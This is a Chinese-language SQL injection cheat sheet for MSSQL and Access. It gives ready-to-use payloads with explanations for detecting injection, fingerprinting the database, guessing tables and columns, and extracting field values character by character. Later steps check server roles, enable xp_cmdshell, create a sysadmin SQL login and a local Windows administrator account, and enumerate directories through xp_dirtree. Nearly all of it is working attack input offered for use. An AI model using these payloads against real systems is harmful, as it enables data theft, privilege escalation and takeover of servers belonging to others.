1.判断是否有注入 ;and 1=1 ;and 1=2 （1=1 页面正常、1=2 页面异常或为空，说明参数被带入了 SQL 查询；两者返回一致则基本不存在注入）
2.初步判断是否是mssql ;and user>0 （mssql 中 user 为 nvarchar 类型，与整数比较会触发类型转换错误，报错信息里会带出当前数据库用户名；只在页面回显数据库错误时有效，否则只能看到出错/空页）

3.注入参数是字符型 'and [查询条件] and ''=' （前面的单引号闭合原语句中的字符串，结尾的 ''=' 与原语句的收尾引号拼成 ''='' 保持语法正确）

4.搜索时没过滤参数的 'and [查询条件] and '%25'=' （%25 经 URL 解码后是 %，用于闭合搜索语句中的 like '%…%'；如果是直接在请求体里提交而不是 URL 参数，写成 % 即可）

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql （sysobjects 是 mssql 的系统表，Access 中不存在）

;and (select count(*) from msysobjects)>0 access （Access 默认对 MSysObjects 没有读权限，通常返回"没有读取权限"之类的错误，这个错误本身也可以用来确认是 Access）

6.猜表名 ;and (select Count(*) from [表名])>0 （from 后面接的是表名而不是数据库名，表存在则页面正常，不存在则报错/异常；常见表名如 admin、user、manage 等逐个尝试）

7.猜字段 ;and (select Count(字段名) from 表名)>0 （字段不存在时语句报错，页面异常；字段存在则页面正常）

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （把 0 换成具体数字，用 >、< 比较可以二分定位长度；top 1 不加 order by 时返回的行不固定，建议加上 order by 主键，保证每次取到同一条记录）

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0

（把 0 换成具体的 ascii 码做二分比较，确定一个字符后把 mid/substring 的起始位置 1 依次加 1 逐字符猜解；同样建议加 order by 固定取到的记录）

10.测试权限结构(mssql) （IS_SRVROLEMEMBER 返回 1 表示当前登录属于该服务器角色，0 表示不属于，NULL 表示角色名或登录名无效；结尾的 ;-- 把原语句剩余部分注释掉）

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));-- （IS_MEMBER 检查的是当前数据库角色，不是服务器角色）

11.添加mssql和系统的帐户 （下面几步都需要当前登录具有 sysadmin 权限；xp_cmdshell 在 SQL Server 2005 及以后版本默认是关闭的，需要先执行 ;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;-- 开启）

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,password,username;-- （参数顺序是 旧密码,新密码,登录名，新建登录旧密码传 null）

;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- （参数顺序是 登录名,角色名）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- （整条命令写在一行，各参数之间用空格分隔）

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int) （xp_dirtree 返回 subdirectory、depth 两列，正好对应 paths、id；目录名超过 100 字符时插入会失败，可以适当加大长度）

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0 （varchar 与整数 0 比较触发类型转换错误，报错信息中回显出目录名；同样依赖页面回显数据库错误）

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （每得到一个目录名就加进 not in 列表，逐个取出剩余目录）

测试结束后记得清理自己建的表：;drop table dirs;--
